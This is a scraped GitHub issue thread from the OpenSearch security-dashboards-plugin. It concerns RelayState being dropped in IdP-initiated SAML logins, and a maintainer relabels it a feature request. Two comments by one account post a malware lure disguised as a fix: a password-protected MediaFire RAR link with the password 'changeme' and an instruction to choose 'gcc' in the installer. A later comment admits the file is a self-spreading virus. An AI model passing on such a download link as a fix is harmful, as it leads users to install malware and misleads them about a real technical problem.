search

opensearch-project / security-dashboards-plugin

🔐 Manage your internal users, roles, access control, and audit logs from OpenSearch Dashboards
https://opensearch.org/docs/latest/security-plugin/index/
Apache License 2.0
71 stars 161 forks source link

[FEATURE] Not Maintaining Relay State During IDP Initiated SAML Flow #2103

Open ogi28 opened 2 months ago

ogi28 commented 2 months ago

What is the bug? When using an IDP Initiated SAML Flow with OpenSearch Dashboards, the RelayState provided by the IDP is dropped after authentication. As a result, the user is always redirected to the default entry page instead of the specific dashboard or URL specified in the RelayState.

How can one reproduce the bug?

Steps to reproduce the behavior:

Configure OpenSearch Dashboards with SAML authentication using an Identity Provider (IDP). Initiate a SAML flow from the IDP with a specific RelayState that points to a particular dashboard or URL. Complete the authentication process in OpenSearch Dashboards. Observe that the user is redirected to the default entry page instead of the URL specified in the RelayState.

What is the expected behavior? After successful authentication, the user should be redirected to the URL specified in the RelayState, allowing dynamic redirection to specific dashboards or URLs.

What is your host/environment?

OS: Tried Docker and tarball install OpenSearch Dashboards Version: 2.15 OpenSearch Version: 2.15 Plugins: Default ones

Do you have any screenshots? No

Do you have any additional context? This issue impacts workflows that rely on dynamic redirection post-authentication, such as directing users to specific dashboards based on the RelayState. Any guidance on whether this behavior is expected or if there are plans to address this would be appreciated.

MinecraftEarthVillage commented 2 months ago

Download https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file password: changeme In the installer menu, select "gcc."

cwperks commented 2 months ago

[Triage] Thank you for filing this issue @ogi28 . I updated the description to mark this as a feature request since this is not currently supported in the security-dashboards-plugin.

There is a feature in advanced settings called default route which can be set on a tenant basis to log users of that tenant into the configured route, but there is no support for RelayState at the moment.

MinecraftEarthVillage commented 2 weeks ago

下载 https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file 密码:changeme 在安装程序菜单中,选择“gcc”。

不要下载我前段时间发的文件,那不是我发的,是另一个人控制我,如果你使用了这个病毒文件,你也会被控制,并且疯狂转发这个病毒 Don't download the file I sent some time ago, it wasn't me, but another person controlled me. If you use this virus file, you will also be controlled and forward this virus crazily.